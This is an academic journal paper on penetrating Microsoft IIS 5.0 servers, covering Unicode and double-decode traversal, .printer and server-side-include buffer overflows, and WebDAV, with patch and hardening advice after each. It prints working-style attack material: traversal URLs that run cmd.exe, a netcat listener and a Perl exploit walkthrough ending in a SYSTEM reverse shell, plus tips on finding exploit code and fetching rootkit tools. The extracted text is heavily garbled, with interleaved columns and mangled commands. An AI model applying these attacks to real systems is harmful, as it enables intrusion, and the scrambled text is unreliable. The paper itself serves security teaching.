Penetrating Internet Information Services (IIS).

1
Odabi I. Odabi and 2Linda Osazuwa
1
Department of Mathematics and Computer Science, Benson Idahosa University, Benin city.
2
Department of Computer Science, Delta State Polytechnic, Ogwashi-Uku.
Telephone: 08033380178. Email: [email protected]

Abstract
The intent of this paper is to provide a number of commonly exploited IIS vulnerabilities.
The understanding of prominent attacks has been presented so that the reader can be
familiar with the concept of vulnerabilities and techniques used to exploit them and to
apply this understanding to future security issues as they arise by Information
Technology professional. Some of the common vulnerabilities found in the Internet
Information Services (IIS) packages have been presented. Note that while some of these
vulnerabilities could be present on IIS 6.0 (particularly in the IIS 5.0 compatibility
mode), none of them will work against a default installation of Windows Server 2003.
This is due to the extensive changes to the default installation profile of IIS 6.0, which
disables all dynamic content and includes no sample applications. As we proceed
through the vulnerabilities, we will include mention of its status on IIS 6.0.

Key words: IIS, http, Expliot, Command and Buffer Hacking, IIS, http, PERL and
Unicode.

_______________________________________________________________________

Introduction
While Internet Information Services Internet fraud has become a common
encompasses a variety of services problem across the globe. Definitely
including FTP, SMTP, AND NNTP, the there is no absolute security in the World
most common IIS server is the World of Information Technology. This paper
Wide Web Publishing Service is where examines the techniques to reduce the
most of the IIS vulnerabilities are found impact of the fraudulent internet users.
and will be the focus of our discussion.
Before we begin discussing the Simple HTTP Requests
vulnerabilities in this service, it is At its most basic, an HTTP
important to understand the basic connection is comprised of a client
operation of HTTP. request and a server response in a single
Considering the wide scope of session. An HTTP request specifies the
security in information delivery, this action and the source requested, as well
paper is centered and limited to Security as any specific connection parameters or
of Internet Information Services. capability definitions provided by the

Vol.99 No.1 December 2013 70

West African Journal of Industrial and Academic Research Vol.
browser. The response will vary through these facilities. The following
depending on the action and the shows an abbreviated POST request.:
resource, but in the majority of cases POST /form.html HTTP/ 1.1
will take the form of HTML data. A very Accept: image/gif, image/x-bitmap,
simple HTTP exchange may look like image/jpeg, image/pjpeg
the following: Content-type: application/x-www-form-
GET / HTTP/1.0 urlencoded
HTTP/1.1 200 OK Content-length: 14
Server: Microsoft-IIS/5.0 username=modea
Date: Sat, 10 May 2003 05:1253 GMT Some basic exploits can be executed
Connection: Keep-Alive entirely within the request URL and can
Content:-Length: 1270 be launched from a standard browser
Content Type: text/html like Internet Explorer. Many exploits
Set-Cookie: require that the attacker have more
ASPSESSIONIDGQQGQJFC=ADAPB precise control over their request, tuning
PDCAKPLECKGHCNHNJIK; Path=/ the parameters normally supplied by the
Cache-control: private browser. In these cases, the attacker
</HTML><BODY> needs more precision than most
<P>Some html data…<BR> browsers can provide.
</BODY</HTML>
The first line is simplified by the Speaking HTTP
browser, specifying the action (GET), Because HTTP is a simple TCP
the resource (/), and the HTTP protocol protocol, it is possible to use a standard
and revision (HTTP/1.0). The browser telnet application to communicate with
follows this GET request with two an HTTP server simply by specifying the
carriage returns, which signals the HTTP HTTP port in the command line.
server that the browser has completed its E:\hacknotes>telnet
request. The first line returned by the naïve.hacknotes.com 80
server is the HTTP response code,
followed by the HTTP headers, and If you are a very good typist, the
finally the HTML data. Unless certain Windows telnet application can provide
keep alive options are set, the server all the facilities needed for many HTTP
terminates the connection after it has hacks, but due to the lack of local echo
responded to the request. (seeing the characters that you are
The example above did not specify typing) using telnet can be trying. For
any request parameters, so our request these types of probes, hackers and
was limited to a single line. Most security professionals alike usually turn
browsers will provide significantly more to the netcat tool, nc. Originally released
information to the server to indicate the by Hobbit on UNIX platforms, and later
types of content the browser can accept, ported to Win32 by Chris Wysopal,
or in the case of forms, the data it is netcat provides a simple network
supplying. These options follow the connection tool that is very well suited
initial action and are followed by two for basic HTTP.
carriage returns. In many IIS (http:/ /www/atstake.com/resear-
vulnerabilities, the exploit is delivered ch/tools/network_utilities/.)
GET / HTTP/1.0

Vol.99 No.1 December 2013 71

West African Journal of Industrial and Academic Research Vol.
[cr]
[cr]
Working with PERL Exploits
Now, we will feed this file into a Perl (Practical Extraction and
netcat connection to our target HTTP Reporting Language) is a multipurpose
server: scripting language available on a very
E:\hacknotes>type getreq nc wide range of platforms. Perl has library
naïve.hacknotes. com 80 support for raw TCP/IP socket
HTTP/1.1 200 OK operations, so an exploit developed in
Server: Microsoft-IIS/5.0 Perl can be just as easily used on
Connection: keep-Alive Windows as it is on Linux or Solaris.
[. . .] Perl exploits are usually more reliable
It is important to provide sample than their C counterparts as platform
HTTP requests that can be used to test dependencies are not involved. When
your own servers. To prevent simple possible in this chapter, we will
errors from affecting your tests, netcat demonstrate Perl exploits instead of the
will be recommended using netcat in this C equivalents.
fashion. For windows systems, the most
common Perl implementation is Active
Delivering Advanced Exploits Perl, available from
When we begin to work with buffer http://www.activestate.com. There are
overflow vulnerabilities in IIS processes, other binary distributions available as
our exploits will need to precisely well a complete list of ports (for
deliver raw binary data, known as Windows and other operating systems)
shellcode, as part of our HTTP request. can be found at the Comprehensive Perl
Some of these exploits can be delivered Archive Network’s homepage at
using the netcat method described above, http://www.cpan.org
but in most cases the exploit developers
provide a Perl or C program that allows Working with C Exploits
simple execution from a command-line In some cases, simple exploits that
interface have been developed for the Linux
When you begin searching the platform can be compiled under the
Internet for exploiting code, you must be Cygwin environment on Windows
very careful with what you find. You systems. Cygwin, available from
should never compile or run anything http://www.cygwin.com, provides an
that you don’t understand, especially emulation layer for applications by
when it comes from an entrusted source. translating Linux system calls to
Code billed as an exploit could actually Windows facilities. Executables
be a virus or Trojan application, even if generated with Cygwin can be used
it is delivered in source form. Proceed at elsewhere provided that the cygwin 1.dll
your own risk, and exercise caution. If library is available. In the Cygwin
you do obtain working exploits, use environment, exploits can be compiled
them responsibly. Forensics consultants like so:
love novice hackers; they leave lots of cygwin$ gcc - o exploit .exe exploit
tracks. .c

Vol.99 No.1 December 2013 72

West African Journal of Industrial and Academic Research Vol.
 Other exploits may be developed to buffer flaws in some of the default
use native Windows socket libraries and ISAPI applications. Many of these issues
usually require a commercial C compiler can result in immediate Local System–
such as Microsoft Visual C++ or level compromise, so an attacker need
Borland C++ to build. If you have access not worry about privilege escalation
to one of these tools, you can usually before he begins harvesting the system’s
compile these exploits by creating a resources [9].
simple command-line executable project
and simply pasting in the exploit code as Unicode /Double Decode URL Parsing
the only source file in the project. If you Attack
are not fortunate enough to have full One of the most simplistic yet
development environment, you will need devastating IIS hacks, the Unicode /
to enlist the services of a colleague to double decode URL parsing
build the exploits you find. As vulnerability, is caused by poor URL
mentioned in the preceding note, you handling within IIS. When a request is
really should not attempt building any C received, IIS checks to ensure that the
exploits without at least a cursory URL specified is acceptable before
knowledge of the language; otherwise, passing it on for processing. If IIS
you may unwittingly play the role of a detects an obvious violation, it rejects
Patient X. the request. So if you point your browser
Often compilation on either platform to
requires basic debugging skills such as http://target_host/scripts/../../../../winnt/s
identifying problems with line breaks or ystem32.cmd.exe?/c+dir, you receive a
invalid characters introduced during 404 error. IIS detects the presence of
HTML or other transfers. Less directory traversal (/../..) and summarily
frequently, the exploits source will be rejects the request.
delivered with a couple of deliberate However, if you replace parts of the
bugs that prevent successful URL with Unicode-encoded strings, IIS
compilation; these errors are easily fails to detect the traversal attempt. The
corrected by experienced programmers reason for this behavior is that IIS
but serve to prevent novices from processes the URL encoding after it
obtaining a working exploit will verifies the validity of the URL. So to
successfully crash the target server but bypass the checking, we can simply
will not return the expected shell [7]. replace parts of the URL with Unicode-
encoded characters, like so:
The Big Nasties: Command Execution http: //naïve/scripts/ .. %c0%af. .
These issues, though easily patched, /winnt/system32/cmd.exe?/c+dir+d:\
provide attackers quick and easy access Creating a netcat input file, with this
to the remote system either by fooling resource, we can create a simple
IIS into allowing arbitrary file system command to test servers for Unicode
navigation or by exploiting unchecked exposure:

E:\hacknote>type uniget.txt nc 192.168.100.15 80

HTTP/1.1 200 OK
Server: Microsoft–IIS/5.0
DATE: SAT, 10 May 2003 18:5431 GMT

Vol.99 No.1 December 2013 73

West African Journal of Industrial and Academic Research Vol.
Content-Type: application/octet-stream
Volume Serial Number is 6532-EE86
Directory of d: \
12/07/1999 05:00a 45 AUTORUN.INF
12/07/1999 50:00a <DIR> BOOTDISK
12/07/1999 50:00a 5 CDROM_IS.5
12/07/1999 50:00a 5 CDROM_NT.5
12/07/1999 50:00a <DIR> CLIENTS
12/07/1999 50:00a <DIR> 1386
12/07/1999 50:00a <DIR> PRINTERS
12/07/1999 50:00a 16,490 READ1ST.TXT
12/07/1999 50:00a 233,472 README.DOC
12/07/1999 50:00a 151,824 SETUP . EXE

Obviously Unicode filesystem Expressed in this form, our preceding

traversal and command execution was a URL would look like this:
serious vulnerability, allowing advanced
hacking to be conducted by a novice http://naive/scripts/ . .%255c. .
with no more elaborate tools than a copy /winnt/system32cmd.exe?/c+dir
of Internet Explorer. Microsoft
responded quickly with a patch for the Double-decode can work equally well
issue in security bulletin MS00-086. The regardless of whether or not the target
patch was also rolled up with the release has installed SP2 or MS00-086. When
of Windows 2000 Service Pack 2. the host does have one of these patches,
Unfortunately, a short time later a very it performs a single pass of decoding on
similar parsing flaw was discovered, the URL, so when the URL is processed,
affecting even servers running SP2. it looks like this:
While the MS00-086 patch had updated
IIS to decode the Unicode entries in the http://naive/scripts/ . .%5c. .
URL before passing the request, /winnt/system32cmd.exe?/c+dir
researchers at NSFocus determined that The %5c is simple hexadecimal
because IIS performed only one Unicode encoding of the / character, so the
translation before validation, they could request is equivalent to our Unicode
simply provide “double encoding” by attacks above. The doubled-decode
specifying the hexadecimal equivalent of vulnerability was addressed as a post-
the % sign, %25. After this first SP2 patch in security bulletin MS01-026
encoding is processed, the remaining and included in Windows 2000 SP3.
URL can be even more simplistic than Let us take a quick moment to take a
those used to exploit the Unicode look at the URLs we have provided in
vulnerability. This technique for these requests. We
bypassing the Unicode protection in will dissect our Unicode, http://naive/scr
MS00-086 is referred to as “double- ipts..%c0%af../winnt/system32/cmd.exe
decode” or “superfluous Unicode/” ?/c+dir+d:\. First, notice that the request
begins with a legitimate IIS default

Vol.99 No.1 December 2013 74

West African Journal of Industrial and Academic Research Vol.
directory, scripts. In a default IIS5.0 administrators are encouraged to review
install, this virtual directory allows their file system permissions to decide if
execution of both scripts executable the current file system permissions
programs, whereas the root directory afforded to the Internet guest accounts
permits only script execution. Other are acceptable. Windows Server 2003
default virtual directories have similar does not suffer from either of these
permissions, so if at first you do not vulnerabilities.
succeed, try and try again. Even though The lessons learned from Unicode and
the actual program we are running is double-decode go well beyond
well out of the web directory, the fact maintaining patch levels. For the vast
that the directory traversal begins in the majority of sites, there is no reason that
scripts virtual directory allows us to run the Internet guest accounts require and
command-line applications. If you try execute access to system executables
executing the previous netcat test such as cmd.exe. The variety of attacks
without the scripts directory, the request that were enabled by allowing even
will fail. [1] unprivileged arbitrary command
Following the scripts directory, we execution opened the eyes of many
have our encoded directory traversal. security administrators and Microsoft
There are actually a variety of encoding product managers alike. The
to accomplish this–some Unicode and overwhelming success of the Unicode
some double-encoded. After we’ve and double-decode exploits were a
completed our directory traversal (to the significant motivator in the design and
drive root, in this case), we simply walk default configuration of IIS 6.0. Were
back up the directory tree to an such a vulnerability to be discovered in
executable who’s location we have Windows Server 2003, the attacker
guessed based on common defaults. Our would find the file system much less
final resource for this URL is cmd.exe, accommodating to Internet guest
and we provide command-line options accounts.
using standard URL parameter passing.
If we can guess where the application is, Printer Buffer Overflow
we can run it! However, this means that In mid-2001, vulnerability was
if the web root is not on the same file discovered by researchers at eEye
system as the system directory, we are Digital Security (http://www.eeye.com)
more limited in finding applications. in the Internet Printing Protocol
implementation installed by default on
Preventing Unicode/Double-Decode IIS v5.0. The protocol is handed in IIS
Attacks by an ISAPI extension that maps the
Windows 2000 SP2 (and the sp1 resource extension .printer to the
hotfix MS00-086) introduced a fix to the new3prt.dll application. The team at
original Unicode problem, and the eEye discovered an unchecked buffer in
subsequent double-decode vulnerability this DLL’s request handling of the Host
was addressed in SP3 or the SP2 hotfix header field. Beyond a certain amount of
MS01-026. The patches provide better data, any information contained in the
defense against encoded URLs, but they Host header would simply overrun
do not impose any additional restrictions system memory. If the data introduced
on the Internet user accounts, so into memory were junk, IIS would

Vol.99 No.1 December 2013 75

West African Journal of Industrial and Academic Research Vol.
simply crash and restart automatically. So how do attackers and security
If, however, the data were carefully professionals find exploit code? Within
formulated shellcode, the attacker could the first days of vulnerability’s release,
introduce executable code in the Host exploits are usually hard to come by and
header field, which would be executed in are being closely guarded by their
the msw3prt.dll application. Further authors. Often, working exploits exist
complicating the issue, the msw3prtll long before the vulnerability is
was defined as an “in-process” announced, as researchers who find
application and would execute with the problems will usually allow the vendor
same Local System privileges as the IIS some time to respond to the issue before
server itself, instead of the more they go public. After the vulnerability is
restricted Internet guest accounts. released, other researchers may begin
For a simple test for the presence of developing exploits, and it’s not
the vulnerability, we can formulate a uncommon for a few different exploits to
simple GET request for delivery with exist for the same issue. Usually, within
our netcat method described earlier. The a week or so of the initial announcement,
request file for this attack would look functional exploit can be found in
like the following: security-related newsgroups and web
GET /anything .printer HTTP/1.0 sites. To obtain the exploit we describe
Host: [any character repeated 422 times] for the printer vulnerability, we simply
Delivery of this probe does not return searched Google.com for “IIS .printer
anything of significance back to the exploit code”–the code we use in this
attacker. On a vulnerable server, paper was the second link returned.
however, the Event Log records a To keep things simple, we will use a
number of entries in the system Log, Perl version of this exploit developed
depending on how many services are Cyrus The Great, ported from both the
running under the core IIS process, original proof-of-concept code released
inetinfo.exe. The Event Log entries will by eEye and the shellcode from dark
read something like the following: spyrit’s jill.c application which can be
The World Wide Web Publishing accessed from http://www.securiteam.com).
Service terminated unexpectedly. It has A quick search for “IIS .printer
done this 2 time(s). The following exploit code” or “IISHACK2000 perl”
corrective action will be taken in 0 should turn up a few sources for this
milliseconds: No action exploit, including. When you find the
Well, crashing a service is kind of fun, Perl script, simply copy and paste the
but IIS 5.0’s immediate restart features script into a text file and save it with a
means even the crash is short-lived. No .pl extension. For our example, we have
worries. A number of researchers picked named the script prnthbo.pl. The
up on eEye’s announcement of the comments at the top of the script provide
.printer vulnerability, and in short order simple instructions:
a few different exploits began turning up
for the vulnerability. Most of these # shell code spawns a reverse CMD shell
exploits were based on the jill.c exploit , you should setup a
code released by dark spyrit of beavuh # listeners ..
labs, and all behave similarly [2]. # use ncllnt for Windows platform, nc
for unix

Vol.99 No.1 December 2013 76

West African Journal of Industrial and Academic Research Vol.
# nc -1 –v –t –p <attacker port > 192. 168 . 100 .15 80 192 . 168 . 100 .
4 8000
So now we get to use netcat for a Connecting…
whole other purpose. Before we launche Sending exploit…
pur attack, we will create a listening port Exploit sent .. you may need to send a
on our host. If the exploit is successful, CR on netcat listening port
it will actually call us back on the port Following Cyrus’s instructions once
we specify and feed us a command again, we switch back to our netcat
prompt (this process is often referred to listener window. If our exploit was
as “shoveling a shell”). A note before we successful, we should see a connect
try this exploit–due to the way the statement in the window now. Sending
shellcode executes, there is a very good the carriage return completes the
chance that the IIS server will be connection, and we receive our
rendered unusable until it is actually command prompt. As our last step, we’ll
rebooted. This is not something you confirm our user context with the
want to try against a production site, and whoami.exe resource kit tool, as we did
certainly not something you want to try before with the Unicode attack.
against any machines that you do not
administer [2]. connect to [192 . 168 . 100 .4] from
To kick off this exploit, we will need NAÏVE [192 .168 . 100 .15] 1035
to open two command prompt windows. Microsoft windows 2000 [Version 5.00 .
In the first, we will start a netcat listener 2195]
as suggested in the comments of the Perl (c) copyright 1985 – 1999 Microsoft
script. We will set up a netcat listener on corp.
TCP port 8000, using the following E: \WINNT\system32>
command: E: \WINNT\system32>cd \
cd \
E: \hacknotes> -1 –v –p 8000 e: \>whoami . exe
Listening on [any] 800 whoami . exe
Now we will switch to our seconds NT AUTHORITY\SYSTEM
prompt and use Perl to execute the E: \>
script, rpntbo.pl. The author was even While we cannot run interactive
kind enough to include command applications from this command prompt
command-line usage assistance: due to the limitations of our netcat
E: \hacknotes\exploits>perl prntbo .pl session, we have full access to the file
Usage: system and executables and can set
Prntbo.pl <victim host> port> <listen about building ourselves a nice little
host> <listen port rootkit. Using command-line file
Victim Host: Address of IIS5 server to acquisition tools like tftp or ftp, the
own attacker will download other command-
Victim Port: IIS5 service port ( 80 ) line utilities he can use to make the
Listen host: Attacker host IP address session more comfortable [10]
Listen port: Port number of netcat There is one stick, though, that is
listener constantly forgotten by novice attackers–
E: \hacknotes\exploites>perl prntbo .pl \ if you issue a CTRL-C to cancel an
operation (such as a directory listing of

Vol.99 No.1 December 2013 77

West African Journal of Industrial and Academic Research Vol.
the System32 directory on a slow link), • Select WWW Service and click
you will actually cancel your netcat Edit.
session, and your command shell will be • Click the Home Directory tab.
lost. Worse, because the shellcode • Click the Configuration button.
(understandably) has no error control, it
will not terminate on its own when you 1. In the Application
disconnect. If you do not quit the remote Configuration dialog box, remove any
shell by explicitly calling exit before you ISAPI application mappings that are not
disconnect, the remote server will go specifically required for your web site.
into an unrecoverable failure mode and Typically, IIS buffer overflows do not
will need to be rebooted. You will go occur in the core IIS program
into an unrecoverable failure mode and inetinfo.exe but in one of the
will need to be rebooted. You will not applications just defined. The default
be able to get back in via the .printer activation of all ISAPI of these
exploit until the system has been applications provides a number of
restarted. The same applies if you run pathways for an attacker. When in doubt,
the exploit without a listener to catch the remove all ISAPI mappings and then re-
shell. These caveats make this a fairly add the ones that are in fact required by
risky exploit to try – if you blow it, you your sites. Windows Server 2003 ships
will take IIS out of the picture entirely with no ISAPI extensions enabled by
(possibly leaving the system a whole lot default, requiring administrators to
more secure in the process). explicitly enable the ones they need.

Remove IIS .PRINTER Functionality Server-Side Include Buffer Overflow

The buffer overflow issue in the Attack
msw3prt.dll was corrected in the patch In June of 2001, researchers with the
accompany Microsoft security bulletin NSFocus Security Team Contacted
MS1-023, and was included in Windows Microsoft about a vulnerability they had
2000 SP2. Windows Server 2003 does uncovered in the code that managed
not even offer the .print ISAPI mapping server-side includes (SSI) as an ISAPI
by default. On IIS 5.0 however, unless application, ssinc.dll. By default, the
the Internet Printing Protocol function is extensions .shtm, .shtml, and .stm are
in use, administrators are strongly mapped to the SSI application. When the
encouraged to remove the ISAPI SSI sees a directive like the following, it
application mapping for .printer opens the file specified and outputs all
resources. The ISAPI mappings can be the content as if it had been included in
defined for the entire or an individual file specified and outputs all the content
web site from the IIS management as if it had been included in the original
console snap-in. .shtml file:
• Start the Internet Information <! - - #include file=”afile.html”-->
Services Manager by selecting The NSFocus researchers discovered
Start Run… inetngr. that when the SSI checked the filename
• right-click the server name in the length (to ensure that it would not
left-hand panel and select overflow any buffers), it did not take
Properties. into account the length of any relative
paths, such as the one the .shtml file was

Vol.99 No.1 December 2013 78

West African Journal of Industrial and Academic Research Vol.
being called from. As a result, there lies Create a directory in the web root
an opportunity to overflow the buffer by whose name is 12 characters long eg. ssi
specifying a filename that occupies the overflow then put file into the new
entire buffer and is called from a relative directory. Start up a netcat listener:
path. The attack for the SSI buffer
overflow is a little more challenging nc -1 -p <attacker port> -vv
because it requires some setup in the access the file http: //
web root directory itself. This can target/ssi_overflow/ssi.shtml
frequently be accomplished through using a web browser. A SYSTEM shell
other hacks, such as the Unicode/double- will appear.
decode command execution described administrator@mandark ~ $ 1s
earlier, but does severely limit the ssi.exe ssi.shtml ssi_exploit.c
usefulness of this vulnerability.
An exploit was released for the Following the instructions, we transfer
Server-Side Include vulnerability by this file to our target host and set it up
Indigo in December of 2001, a small the / ssi_overflow directory. This may be
program called jim.c (in reference to done using legitimate permissions (such
dark spyrit’s jill.c exploit for the .printer as on an intranet workgroup web server),
buffer overflow, discussed earlier). The or through another hack such as the
jim.c tool is used to create an .shtml file Uncode command execution. In some
that, if accessed from a web client, cases, an inexperienced administrator
spawns a shell back to the attacker in the may have even allowed Write access to
same fashion as we did with the .printer the root directory, and you can simply
vulnerability. jill.c can easily be found PUT the file to the web server. After the
by searching for “IIS SSI exploit” or file is loaded, we go ahead and fire up
from the Securiteam web site exploit our netcat listener again, and then
archive at http://www.securiteam.com browse to http://targetssi_overflow /
/exploits/archive. The source included ssi.shtml. If the system is not properly
on this site does have one or two small patched and we have a bit of luck on our
errors that will affect its compilation– side, our netcat listener will pick up a
you may have better luck compiling this shell being shoveled back to us. If we’re
one in a Cygwin environment as we not so fortunate, we’ll have dumped a
have done. Once built, the tool is file on the remote host and through a few
executed by simply providing the IP Event Log Entries to boot from crashing
address and port that you’d like the IIS via the ssinc.dll application [8].
target host to connect back to [6]
administration@mandark ~ Disable Server-Side Includes
$ ./ssi .exe 192 . 168 .100 .4 800 The server-side include vulnerability
jim - IIS Server Side Include overflow was addressed in a rollup patch in
launcher by Indigo@talk21 . com> 2001 Microsoft security bulletin MS1-044,
To exploit this vulnerability you must and is included in Windows 2000 SP3.
have writ access to the web root of the This patch addresses the buffer overflow
target web server. within the ssinc.dll ISAPI application
This program will generate a field that is called by the .shtml file created by
called ssi . shtml. jim.c. Like all ISAPI filters, if server-
side includes are not specifically

Vol.99 No.1 December 2013 79

West African Journal of Industrial and Academic Research Vol.
required by the web sites operating on the exploit properly, returning instead
the server, the mappings for .shtml, nothing more than an invalid request
shtml, and .stm should be deleted from error. However, some recent attacks
all sites. Refer to the .printer overflow have been attributed to this WebDAV
described earlier for instructions on buffer overflow, so it is possible that
removing ISAPI application mappings in there are more robust exploits available
“Remove IIS .printer Functionality.” in limited circulation.

WebDAV ntdll.dll Buffer Overflow Update ntdll.ll, Disable WebDAV

Attack The WebDAV buffer overflow is
WebDAV is an HTTP extension corrected in the post-SP3 hotfix
introduced in HTTP v1.1 that defines available in Microsoft security bulletin
special actions for use in authoring and MS03-007. While WebDAV is not
managing web content. WebDAV stands available in IIS 4.0, there is a patch
for Web-based Distributed Authoring available for Windows NT v4.0 as this
and Versioning, and is supported in IIS vulnerability actually exists in a core
v5.0 by default. In March 2003, system library and could potentially be
Microsoft issued security bulletin MS03- exploited by other methods than
007 describing an unchecked buffer in WebDAV.
the WebDAV handling routines, a Even if the patch is applied, if
vulnerability that could be exploited WebDAV is not required on an IIS
through a default installation of IIS. The server best practice suggest that the
actual vulnerability lies in a core WebDAV methods exposed be disabled.
operating system library, ntdll.dll. The IIS Lockdown tool can install
When IIS receives a WebDAV URLScan and configure it to block all
request, it does not perform any length WebDAV methods requests. If
checking on the request resource. So it is WebDAV services are required and the
possible to supply a filename in excess patch cannot be applied, Microsoft
of 65,535 bytes in length and it will be provides additional solutions in the
happily passed to lower-level operating MS03-007 regarding specific tools that
system functions, whereas a properly can be installed to mitigate the risk from
formatted filename can overrun memory this vulnerability [3].
and result in privileged code execution.
While the WebDAV attack is the first Remove IDQ/IDA Mappings
method of exploiting this issue in The Index Server vulnerabilities
ntdll.dll, Litchfield provides a long list exploited by Code Red (and a host of
of in excess of other functions that call other tools) were corrected in the patch
the same flawed function that triggers associated with Microsoft security
the WebDAV buffer overflow bulletin MS1-033 (later rolled up into
(http://www.nextgenss.com/papers/ms03 MS1-044), and are included in Service
-007 ntdll.pdf.) Pack 3. The patch corrects the
Public WebDAV exploits exist in both unchecked buffer condition in the
C-source and Perl forms and operate in IDQ.DLL application but does not
the standard”shell back to attacker” disable the associated ISAPI mappings.
fashion. The public exploits are finicky, The MS01-044 roll-up patch included a
however, and frequently fail to trigger number of other patches, affecting some

Vol.99 No.1 December 2013 80

West African Journal of Industrial and Academic Research Vol.
 denial-of-service vulnerabilities we have guest accounts, the core server process
omitted from our discussion. executes as highly privileged system
user. The common availability of this
service combined with the variety of
Conclusion. default exposures it contains has helped
One of the most common ports-of- IIS earn an unenviable reputation for
entry for an attacker is the HTTP server security [5]
provided by Internet Information The information presented here is
Services (IIS). These services have a really just a tip of the iceberg for web
long history of vulnerabilities, both hacking. We have concentrated on IIS
within the server and in the core service and its default extension, but
extensions that are installed by default. there are a whole World of different
While most of the plug-in extensions vulnerabilities present in the puzzle.
execute under the restricted Internet user

References
[1] http:/ /www/atstake.com/resear-ch/tools/network_utilities/.
[2] http:// packetstormsecurity.
[3] http://www.microsoft.com/windows2000/techinfo/reskit/tools/default.asp.
[4] http://www.nextgenss.com/papers/ms03-007 ntdll.pdf
[5] http://www.securiteam.com
[6] http://www.securiteam.com/exploits/archive
[7] Mcclure S., Scambray J. and Kurtz G. (1999), Hacking Exposed: Network Security
Secrets and Solutions, Osborne/McGraw-Hill Pp 45 – 47.
[8] Michael O’Dea (2003),”Hack Notes, Window Security Portable Reference, McGraw-
Hill/Osborne, Pp 124-126.
[9] Mike Shema (2003), HackNotes Web Security Portable Reference, McGraw-
Hill/Osborne, Pp 96
[10] Mike Shema and Bradley C. Johnson (2004), Anti-Hackers Tool Kit, McGraw-
Hill/ Osborne, Pp 23.

Vol.99 No.1 December 2013 81

West African Journal of Industrial and Academic Research Vol.